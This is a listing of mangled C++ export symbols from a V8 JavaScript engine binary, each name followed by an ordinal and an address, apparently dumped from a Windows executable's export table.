                                  ?BitcastWord32ToWord64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31750x140ec3200
                                  ?BitcastWord32ToWord64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31760x140e0e260
                                  ?BitcastWordToTagged@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@@Z31770x140e6a200
                                  ?BitcastWordToTagged@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31780x140ec32b0
                                  ?BitcastWordToTagged@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31790x140e0e320
                                  ?BitcastWordToTagged@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31800x140e6a260
                                  ?BitcastWordToTaggedSigned@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VSmi@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@@Z31810x140e6a2a0
                                  ?BitcastWordToTaggedSigned@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31820x140ec3370
                                  ?BitcastWordToTaggedSigned@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31830x140e0e3f0
                                  ?BitcastWordToTaggedSigned@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31840x140e6a300
                                  ?BitsetGlb@Type@compiler@internal@v8@@AEBAIXZ31850x140e2ec20
                                  ?BitsetGlbForTesting@Type@compiler@internal@v8@@QEAA?AV1234@XZ31860x1404594c0
                                  ?BitsetLub@Type@compiler@internal@v8@@AEBAIXZ31870x140e2eca0
                                  ?BitsetLubForTesting@Type@compiler@internal@v8@@QEAA?AV1234@XZ31880x1404594e0
                                  ?BitwiseAnd@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31890x140e0af30
                                  ?BitwiseNot@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31900x140e09840
                                  ?BitwiseOr@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31910x1400769d0
                                  ?BitwiseXor@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31920x140e0d620
                                  ?BlockCount@FunctionData@Coverage@debug@v8@@QEBA_KXZ31930x140a79be0
                                  ?BoolConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@_N@Z31940x1409e9930
                                  ?Boolean@Type@compiler@internal@v8@@SA?AV1234@XZ31950x140459500
                                  ?BooleanConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@_N@Z31960x140e6a340
                                  ?BooleanConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@_N@Z31970x140e35260
                                  ?BooleanMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ31980x140ea68c0
                                  ?BooleanMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ31990x140ec3420
                                  ?BooleanNot@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ32000x1400769d0
                                  ?BooleanOrNullOrNumber@Type@compiler@internal@v8@@SA?AV1234@XZ32010x140459510
                                  ?BooleanOrNullOrUndefined@Type@compiler@internal@v8@@SA?AV1234@XZ32020x140459520
                                  ?BooleanOrNumber@Type@compiler@internal@v8@@SA?AV1234@XZ32030x140459530
                                  ?BooleanValue@Object@internal@v8@@QEAA_NPEAVIsolate@23@@Z32040x14076f240
                                  ?BooleanValue@ObjectRef@compiler@internal@v8@@QEBA_NXZ32050x140ddaff0
                                  ?BooleanValue@Value@v8@@QEBA_NPEAVIsolate@2@@Z32060x140a79c10
                                  ?Boolean_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ32070x140421ac0
                                  ?Boolean_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ32080x140727660
                                  ?BoundFunction@Type@compiler@internal@v8@@SA?AV1234@XZ32090x140459540
                                  ?Boundaries@BitsetType@compiler@internal@v8@@CAPEBUBoundary@1234@XZ32100x140e2ed80
                                  ?BoundariesArray@BitsetType@compiler@internal@v8@@0QBUBoundary@1234@B32110x1418e7070
                                  ?BoundariesSize@BitsetType@compiler@internal@v8@@CA_KXZ32120x14098e570
                                  ?BoundsCheck@ModuleWireBytes@wasm@internal@v8@@QEBA_NVWireBytesRef@234@@Z32130x140421ad0
                                  ?BracketListDelete@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@W4DFSDirection@1234@@Z32140x140ff8380
                                  ?BracketListTRACE@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@@Z32150x140ff8430
                                  ?Branch@BranchMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ32160x1400769d0
                                  ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@AEBV?$function@$$A6AXXZ@std@@1@Z32170x140e6a380
                                  ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@AEBV?$function@$$A6AXXZ@std@@PEAVCodeAssemblerLabel@234@@Z32180x140e6a5f0
                                  ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@AEBV?$function@$$A6AXXZ@std@@@Z32190x140e6a7b0
                                  ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@1@Z32200x140e6a970
                                  ?Branch@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4BranchHint@234@W4IsSafetyCheck@234@@Z32210x140e09620
                                  ?Branch@DiamondMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ32220x140076c50
                                  ?Branch@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRawMachineLabel@234@1@Z32230x140ee15a0
                                  ?BranchHintOf@compiler@internal@v8@@YA?AW4BranchHint@123@QEBVOperator@123@@Z32240x140e09700
                                  ?BranchOperatorInfoOf@compiler@internal@v8@@YAAEBUBranchOperatorInfo@123@QEBVOperator@123@@Z32250x1402e6a30
                                  ?BranchOrBacktrack@RegExpMacroAssemblerX64@internal@v8@@AEAAXW4Condition@23@PEAVLabel@23@@Z32260x1404435c0
                                  ?BranchWithCriticalSafetyCheck@GraphAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAV?$GraphAssemblerLabel@$0A@@234@1@Z32270x140ec3480
                                  ?Break@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ32280x14086c9c0
                                  ?Break@Debug@internal@v8@@QEAAXPEAVJavaScriptFrame@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z32290x1409be380
                                  ?BreakDownTime@DateCache@internal@v8@@QEAAX_JPEAH1111111@Z32300x1409d3030
                                  ?BreakIfFalse@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@@Z32310x14086c9f0
                                  ?BreakIfNull@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ32320x14086ca20
                                  ?BreakIfTrue@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@@Z32330x14086ca50
                                  ?BreakIfUndefined@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ32340x14086ca80
                                  ?BreakIndexFromPosition@BreakIterator@internal@v8@@AEAAHH@Z32350x1409be8c0
                                  ?BreakOnNode@CodeAssembler@compiler@internal@v8@@QEAAXH@Z32360x140e6aa70
                                  ?BreakRightNow@debug@v8@@YAXPEAVIsolate@2@@Z32370x140a79c30
                                  ?BroadcastSharedWasmMemoryGrow@BackingStore@internal@v8@@SAXPEAVIsolate@23@V?$shared_ptr@VBackingStore@internal@v8@@@std@@@Z32380x14083e930
                                  ?Buffer@ArrayBufferView@v8@@QEAA?AV?$Local@VArrayBuffer@v8@@@2@XZ32390x140a79c70
                                  ?Build@CodeBuilder@Factory@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@34@XZ32400x140943d80
                                  ?BuildCFG@Scheduler@compiler@internal@v8@@AEAAXXZ32410x140fb5b50
                                  ?BuildCheckEqualsName@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@AEBVNameRef@234@PEAV5234@11@Z32420x140f7c250
                                  ?BuildElementAccess@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@0000AEBVElementAccessInfo@234@AEBVKeyedAccessMode@234@@Z32430x140f7c300
                                  ?BuildExtendPropertiesBackingStore@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@AEBVMapRef@234@PEAV5234@11@Z32440x140f7e1d0
                                  ?BuildGetModuleCell@JSTypedLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z32450x140f8b100
                                  ?BuildIndexedStringLoad@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00PEAPEAV5234@1W4KeyedAccessLoadMode@34@@Z32460x140f7e740
                                  ?BuildInitialYield@Parser@internal@v8@@AEAAPEAVExpression@23@HW4FunctionKind@23@@Z32470x14072af70
                                  ?BuildInitializationBlock@Parser@internal@v8@@AEAAPEAVStatement@23@PEAUDeclarationParsingResult@?$ParserBase@VParser@internal@v8@@@23@@Z32480x14072b0b0
                                  ?BuildInternal@CodeBuilder@Factory@internal@v8@@AEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@_N@Z32490x140943dc0
                                  ?BuildLoopTree@LoopFinder@compiler@internal@v8@@SAPEAVLoopTree@234@PEAVGraph@234@PEAVTickCounter@34@PEAVZone@34@@Z32500x140f9fa20
                                  ?BuildParameterInitializationBlock@Parser@internal@v8@@AEAAPEAVBlock@23@AEBUParserFormalParameters@23@@Z32510x14072b180
                                  ?BuildPropertyAccess@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@00000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@W4AccessMode@234@@Z32520x140f7ec20
                                  ?BuildPropertyLoad@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@0000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@@Z32530x140f7ed70
                                  ?BuildPropertyStore@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@00000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@W4AccessMode@234@@Z32540x140f7efb0
                                  ?BuildPropertyTest@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@0AEBVPropertyAccessInfo@234@@Z32550x140f7fc90
                                  ?BuildRejectPromiseOnException@Parser@internal@v8@@AEAAPEAVBlock@23@PEAV423@W4REPLMode@23@@Z32560x14072b4e0
                                  ?BuildReturnStatement@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEAVStatement@23@PEAVExpression@23@HH@Z32570x1406f9340
                                  ?BuildTFGraph@wasm@internal@v8@@YA?AV?$Result@$$T@123@PEAVAccountingAllocator@23@AEBVWasmFeatures@123@PEBUWasmModule@123@PEAVWasmGraphBuilder@compiler@23@PEAV6123@AEBUFunctionBody@123@PEAVNodeOriginTable@923@@Z32580x14059d4f0
                                  ?BuildTranslation@CodeGenerator@compiler@internal@v8@@AEAAPEAVDeoptimizationExit@234@PEAVInstruction@234@H_KVOutputFrameStateCombine@234@@Z32590x140e49cf0
                                  ?BuildTranslationForFrameStateDescriptor@CodeGenerator@compiler@internal@v8@@AEAAXPEAVFrameStateDescriptor@234@PEAVInstructionOperandIterator@234@PEAVTranslation@34@VOutputFrameStateCombine@234@@Z32600x140e49fc0
                                  ?BuildTree@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@PEA_KPEAPEAV5234@_KPEBVBitVector@34@H2@Z32610x140ea7ed0
                                  ?BuildUnaryExpression@Parser@internal@v8@@AEAAPEAVExpression@23@PEAV423@W4Value@Token@23@H@Z32620x14072b8b0
                                  ?ByteLength@ArrayBuffer@v8@@QEBA_KXZ32630x140a79d90
                                  ?ByteLength@ArrayBufferView@v8@@QEAA_KXZ32640x140a79da0
                                  ?ByteLength@BackingStore@v8@@QEBA_KXZ32650x140076c50
                                  ?ByteLength@Contents@ArrayBuffer@v8@@QEBA_KXZ32660x140076c50
                                  ?ByteLength@Contents@SharedArrayBuffer@v8@@QEBA_KXZ32670x140076c50
                                  ?ByteLength@SharedArrayBuffer@v8@@QEBA_KXZ32680x140a79d90
                                  ?ByteOffset@ArrayBufferView@v8@@QEAA_KXZ32690x140a79dc0
                                  ?Bytecode@JSRegExp@internal@v8@@QEBA?AVObject@23@_N@Z32700x14076f360
                                  ?BytecodeHasHandler@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@W4OperandScale@234@@Z32710x14086f360
                                  ?CEntry@CodeFactory@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@23@PEAVIsolate@23@HW4SaveFPRegsMode@23@W4ArgvMode@23@_N@Z32720x1409f9110
                                  ?CEntryStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@HW4SaveFPRegsMode@34@W4ArgvMode@34@_N@Z32730x140ea6940
                                  ?CEntryStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@H@Z32740x140ec35d0
                                  ?CachedDataVersionTag@ScriptCompiler@v8@@SAIXZ32750x140a79e10
                                  ?CalculateAllocationLimit@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@SA_KPEAVHeap@23@_K111NW4HeapGrowingMode@423@@Z32760x14093de40
                                  ?CalculateAllocationLimit@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@SA_KPEAVHeap@23@_K111NW4HeapGrowingMode@423@@Z32770x14093dfc0
                                  ?CalculateCapacity@LayoutDescriptor@internal@v8@@CAHVMap@23@VDescriptorArray@23@H@Z32780x140421af0
                                  ?CalculateFixedFrameSize@CallDescriptor@compiler@internal@v8@@QEBAHW4Kind@Code@34@@Z32790x140e673e0
                                  ?CalculateValue@Utf8@unibrow@@SAIPEBE_KPEA_K@Z32800x1405fb270
                                  ?Call@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z32810x1409f92c0
                                  ?Call@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBVCallDescriptor@234@@Z32820x140e09740
                                  ?Call@Execution@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1HQEAV623@@Z32830x14098e6d0
                                  ?Call@Function@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@HQEAV52@@Z32840x140a79ea0
                                  ?Call@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KAEBVCallFrequency@234@AEBUFeedbackSource@234@W4ConvertReceiverMode@34@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z32850x140eabf30
                                  ?Call@TurboAssembler@internal@v8@@QEAAXPEAVLabel@23@@Z32860x1404360d0
                                  ?Call@TurboAssembler@internal@v8@@QEAAXV?$Handle@VCode@internal@v8@@@23@W4Mode@RelocInfo@23@@Z32870x1404978b0
                                  ?Call@TurboAssembler@internal@v8@@QEAAXVExternalReference@23@@Z32880x1404979c0
                                  ?Call@TurboAssembler@internal@v8@@QEAAXVOperand@23@@Z32890x1404979f0
                                  ?Call@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z32900x1404360e0
                                  ?Call@TurboAssembler@internal@v8@@QEAAX_KW4Mode@RelocInfo@23@@Z32910x140497a50
                                  ?CallAnyReceiver@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z32920x1408909c0
                                  ?CallApiCallback@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z32930x1409f9300
                                  ?CallAsConstructor@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@HQEAV?$Local@VValue@v8@@@2@@Z32940x140a7a330
                                  ?CallAsFunction@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@HQEAV52@@Z32950x140a7a760
                                  ?CallBuiltin@TurboAssembler@internal@v8@@QEAAXH@Z32960x140497aa0
                                  ?CallBuiltinByIndex@TurboAssembler@internal@v8@@UEAAXVRegister@23@@Z32970x140497b40
                                  ?CallCFunction@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z32980x140e6aaf0
                                  ?CallCFunction@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z32990x140ee16f0
                                  ?CallCFunction@TurboAssembler@internal@v8@@QEAAXVExternalReference@23@H@Z33000x140497c10
                                  ?CallCFunction@TurboAssembler@internal@v8@@QEAAXVRegister@23@H@Z33010x140497c50
                                  ?CallCFunctionN@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV?$Signature@VMachineType@internal@v8@@@34@HPEBQEAV5234@@Z33020x140e6ab20
                                  ?CallCFunctionWithCallerSavedRegisters@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@VMachineType@34@W4SaveFPRegsMode@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z33030x140e6ab70
                                  ?CallCFunctionWithCallerSavedRegisters@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@VMachineType@34@W4SaveFPRegsMode@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z33040x140ee1960
                                  ?CallCFunctionWithoutFunctionDescriptor@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z33050x140e6aba0
                                  ?CallCFunctionWithoutFunctionDescriptor@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z33060x140ee19a0
                                  ?CallCheckStackGuardState@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ33070x140443600
                                  ?CallCodeObject@TurboAssembler@internal@v8@@UEAAXVRegister@23@@Z33080x140497ef0
                                  ?CallDebugOnFunctionCall@MacroAssembler@internal@v8@@QEAAXVRegister@23@000@Z33090x140497f20
                                  ?CallDescriptorOf@compiler@internal@v8@@YAPEBVCallDescriptor@123@QEBVOperator@123@@Z33100x140076c70
                                  ?CallEnqueueMicrotask@MicrotaskQueue@internal@v8@@SA_KPEAVIsolate@23@_J_K@Z33110x14096f3a0
                                  ?CallEphemeronKeyBarrier@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4SaveFPRegsMode@23@@Z33120x140498180
                                  ?CallEpilogue@CodeAssembler@compiler@internal@v8@@AEAAXXZ33130x140e6abd0
                                  ?CallForDeoptimization@TurboAssembler@internal@v8@@QEAAX_KHPEAVLabel@23@W4DeoptimizeKind@23@@Z33140x1404982b0
                                  ?CallForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z33150x1409f9320
                                  ?CallForwardVarargs@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KI@Z33160x140eac040
                                  ?CallFunction@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z33170x1409f9340
                                  ?CallFunctionForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z33180x1409f9380
                                  ?CallJSRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@HVRegisterList@234@@Z33190x140890a80
                                  ?CallJSStubImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@AEBVCallInterfaceDescriptor@34@V?$TNode@VObject@internal@v8@@@34@111V?$TNode@UInt32T@internal@v8@@@34@V?$initializer_list@PEAVNode@compiler@internal@v8@@@std@@@Z33200x140e6abf0
                                  ?CallN@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAVCallDescriptor@234@HPEBQEAV5234@@Z33210x140ee19e0
                                  ?CallNWithFrameState@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAVCallDescriptor@234@HPEBQEAV5234@@Z33220x140ee19e0
                                  ?CallNoFeedback@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@@Z33230x140890aa0
                                  ?CallOnceImpl@base@v8@@YAXPEAU?$atomic@E@std@@V?$function@$$A6AXXZ@4@@Z33240x140dbfd20
                                  ?CallPrologue@CodeAssembler@compiler@internal@v8@@AEAAXXZ33250x140e6ad70
                                  ?CallProperty@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z33260x140890ac0
                                  ?CallRecordWriteStub@TurboAssembler@internal@v8@@IEAAXVRegister@23@0W4RememberedSetAction@23@W4SaveFPRegsMode@23@H_K@Z33270x140498320
                                  ?CallRecordWriteStub@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4RememberedSetAction@23@W4SaveFPRegsMode@23@@Z33280x140498500
                                  ?CallRecordWriteStub@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4RememberedSetAction@23@W4SaveFPRegsMode@23@_K@Z33290x140498530
                                  ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@@Z33300x140890c00
                                  ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegister@234@@Z33310x140890c20
                                  ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegisterList@234@@Z33320x140890c40
                                  ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBUFunction@Runtime@34@_K@Z33330x140eac110
                                  ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4FunctionId@Runtime@34@@Z33340x140eac1f0
                                  ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4FunctionId@Runtime@34@_K@Z33350x140eac220
                                  ?CallRuntime@MacroAssembler@internal@v8@@QEAAXPEBUFunction@Runtime@23@HW4SaveFPRegsMode@23@@Z33360x140498560
                                  ?CallRuntime@MacroAssembler@internal@v8@@QEAAXW4FunctionId@Runtime@23@HW4SaveFPRegsMode@23@@Z33370x1404360f0
                                  ?CallRuntime@MacroAssembler@internal@v8@@QEAAXW4FunctionId@Runtime@23@W4SaveFPRegsMode@23@@Z33380x140436130
                                  ?CallRuntimeForPair@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegister@234@VRegisterList@234@@Z33390x140890cc0
                                  ?CallRuntimeForPair@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegisterList@234@1@Z33400x140890d00
                                  ?CallRuntimeImpl@CodeAssembler@compiler@internal@v8@@AEAA?AV?$TNode@VObject@internal@v8@@@34@W4FunctionId@Runtime@34@V534@V?$initializer_list@V?$TNode@VObject@internal@v8@@@internal@v8@@@std@@@Z33410x140e6ad90
                                  ?CallStubN@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4StubCallMode@34@AEBVCallInterfaceDescriptor@34@_KHPEBQEAV5234@@Z33420x140e6afb0
                                  ?CallStubRImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@W4StubCallMode@34@AEBVCallInterfaceDescriptor@34@_KV?$TNode@VObject@internal@v8@@@34@3V?$initializer_list@PEAVNode@compiler@internal@v8@@@std@@@Z33430x140e6b070
                                  ?CallUndefinedReceiver@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z33440x140890d30
                                  ?CallVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z33450x1409f93a0
                                  ?CallWasm@Execution@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VCode@internal@v8@@@23@_KV?$Handle@VObject@internal@v8@@@23@2@Z33460x14098e8b0
                                  ?CallWithArrayLike@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z33470x1409f93c0
                                  ?CallWithArrayLike@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVCallFrequency@234@AEBUFeedbackSource@234@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z33480x140eac250
                                  ?CallWithSpread@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z33490x140890f80
                                  ?CallWithSpread@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z33500x1409f93e0
                                  ?CallWithSpread@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z33510x140eac340
                                  ?Callable@Type@compiler@internal@v8@@SA?AV1234@XZ33520x140459550
                                  ?CallableFor@Builtins@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4Name@123@@Z33530x1409fd700
                                  ?CallableProxy@Type@compiler@internal@v8@@SA?AV1234@XZ33540x140459560
                                  ?CallbackEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z33550x1400768e0
                                  ?CallbackEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z33560x1406d1660
                                  ?CalleeSavedFPRegisters@CallDescriptor@compiler@internal@v8@@QEBAIXZ33570x1402fef40
                                  ?CalleeSavedRegisters@CallDescriptor@compiler@internal@v8@@QEBAIXZ33580x1402f17b0
                                  ?CanAddressRelativeToRootsRegister@InstructionSelector@compiler@internal@v8@@QEBA_NAEBVExternalReference@34@@Z33590x140e35270
                                  ?CanAllocateInReadOnlySpace@Factory@internal@v8@@AEAA_NXZ33600x140944340
                                  ?CanAllocateInReadOnlySpace@OffThreadFactory@internal@v8@@AEAA_NXZ33610x140077dd0
                                  ?CanBeActivated@IncrementalMarking@internal@v8@@QEAA_NXZ33620x140920a30
                                  ?CanBeDeprecated@MapRef@compiler@internal@v8@@QEBA_NXZ33630x140ddb0d0
                                  ?CanBeInvokedWith@AsmFunctionType@wasm@internal@v8@@UEAA_NPEAVAsmType@234@AEBV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@@Z33640x140a62ec0
                                  ?CanBeInvokedWith@AsmOverloadedFunctionType@wasm@internal@v8@@EEAA_NPEAVAsmType@234@AEBV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@@Z33650x140a630e0
                                  ?CanBeNullOrUndefined@NodeProperties@compiler@internal@v8@@SA_NPEAVJSHeapBroker@234@PEAVNode@234@1@Z33660x140e43a50
                                  ?CanBePrimitive@NodeProperties@compiler@internal@v8@@SA_NPEAVJSHeapBroker@234@PEAVNode@234@1@Z33670x140e43c80
                                  ?CanBeRehashed@StartupData@v8@@QEBA_NXZ33680x140a7aba0
                                  ?CanBeSpilled@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z33690x140ef3170
                                  ?CanBreakAtEntry@Debug@internal@v8@@QEAA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z33700x1409be9a0
                                  ?CanContinue@TryCatch@v8@@QEBA_NXZ33710x14042e810
                                  ?CanCover@InstructionSelector@compiler@internal@v8@@QEBA_NPEAVNode@234@0@Z33720x140e352a0
                                  ?CanCover@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z33730x140ef31d0
                                  ?CanCoverTransitively@InstructionSelector@compiler@internal@v8@@QEBA_NPEAVNode@234@00@Z33740x140e353b0
                                  ?CanExpandOldGeneration@Heap@internal@v8@@AEAA_N_K@Z33750x140929d50
                                  ?CanHaveMoreTransitions@TransitionsAccessor@internal@v8@@QEAA_NXZ33760x1407430d0
                                  ?CanMakeExternal@String@v8@@QEAA_NXZ33770x140a7abb0
